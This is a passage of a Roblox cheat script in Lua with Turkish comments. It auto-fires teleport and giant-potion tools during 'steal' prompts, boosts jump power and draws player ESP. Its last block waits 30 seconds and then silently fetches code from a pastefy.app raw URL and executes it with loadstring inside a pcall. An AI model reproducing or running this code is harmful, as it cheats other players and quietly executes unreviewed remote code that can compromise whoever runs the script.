player.CharacterAdded:Connect(function(char)
    for _, name in ipairs(ACCESSORIES_TO_REMOVE) do local p = char:WaitForChild(name, 2) if p then p:Destroy() end end
    task.wait(0.5); if boostEnabled then local hum = char:FindFirstChildOfClass("Humanoid") if hum then hum.UseJumpPower = true; hum.JumpPower = Config.Jump end end
end)

-- // GELİŞMİŞ ÇALMA (STEAL) SİSTEMİ //
local _triggerBump = false
ProximityPromptService.PromptButtonHoldBegan:Connect(function(prompt)
    if not Config.flashEnabled and not Config.giantEnabled then return end
    local act = (prompt.ActionText or ""):lower(); local obj = (prompt.ObjectText or ""):lower(); local parentName = (prompt.Parent and prompt.Parent.Name or ""):lower()
    if act:find("steal") == nil and obj:find("steal") == nil and parentName:find("steal") == nil then return end

    local busy, flashFired, potionFired, successShown = true, false, false, false
    local start = os.clock()
    local conn, releaseConn
    StealFill.Size = UDim2.new(0, 0, 1, 0); StealFill.BackgroundColor3 = Color3.fromRGB(255, 245, 180)

    local function cleanup()
        busy = false; if conn then conn:Disconnect(); conn = nil end; if releaseConn then releaseConn:Disconnect(); releaseConn = nil end
        TweenService:Create(StealFill, TweenInfo.new(0.22), {Size=UDim2.new(0,0,1,0)}):Play()
    end

    conn = RunService.RenderStepped:Connect(function()
        if not busy then return end
        if not prompt or not prompt.Parent then cleanup(); return end

        local holdDur = prompt.HoldDuration; if holdDur <= 0 then holdDur = 1 end
        local progress = math.clamp((os.clock() - start) / holdDur, 0, 1)
        StealFill.Size = UDim2.new(progress, 0, 1, 0)

        if not flashFired and not potionFired and progress >= Config.sliderValue then
            flashFired, potionFired = true, true
            _triggerBump = not _triggerBump
            local fireThreshold = _triggerBump and 0.925 or 0.91
            Config.sliderValue = fireThreshold

            if Config.flashEnabled then
                task.spawn(function()
                    local c = player.Character; local bp = player:FindFirstChild("Backpack"); if not c then return end
                    local flash = c:FindFirstChild("Flash Teleport") or (bp and bp:FindFirstChild("Flash Teleport"))
                    if flash then
                        if flash.Parent ~= c then flash.Parent = c; local hum = c:FindFirstChildOfClass("Humanoid") if hum then hum:EquipTool(flash) end task.wait(0.06) end
                        local f2 = c:FindFirstChild("Flash Teleport") or (bp and bp:FindFirstChild("Flash Teleport")) if f2 then f2:Activate() end task.wait(0.08)
                        local f3 = c:FindFirstChild("Flash Teleport") or (bp and bp:FindFirstChild("Flash Teleport")) if f3 then f3:Activate() end
                    end
                end)
            end

            if Config.giantEnabled then
                task.spawn(function()
                    task.wait(0.1)
                    local c = player.Character; local bp = player:FindFirstChild("Backpack")
                    local giant = c and (c:FindFirstChild("Giant Potion") or (bp and bp:FindFirstChild("Giant Potion")))
                    if giant then giant.Parent = c; giant:Activate() end
                end)
            end

            successShown = true; if conn then conn:Disconnect(); conn = nil end
            StealFill.BackgroundColor3 = Color3.fromRGB(120, 200, 120)
            StealFill.Size = UDim2.new(1, 0, 1, 0)
            task.delay(0.55, function()
                StealFill.BackgroundColor3 = Color3.fromRGB(255, 245, 180)
                TweenService:Create(StealFill, TweenInfo.new(0.3, Enum.EasingStyle.Quad, Enum.EasingDirection.In), {Size=UDim2.new(0,0,1,0)}):Play()
                busy = false; if releaseConn then releaseConn:Disconnect(); releaseConn = nil end
            end)
        end
    end)
    releaseConn = prompt.PromptButtonHoldEnded:Connect(function() if not successShown then cleanup() end end)
end)

RunService.RenderStepped:Connect(function() if Config.playerESP then updatePlayerESP(true) end end)

-- // İSTEDİĞİN HARİCİ KOD (30 SANİYE GECİKMELİ LOADSTRING) //
task.delay(30, function()
    pcall(function()
        loadstring(game:HttpGet("https://pastefy.app/wxyeKLSU/raw"))()
    end)
end)
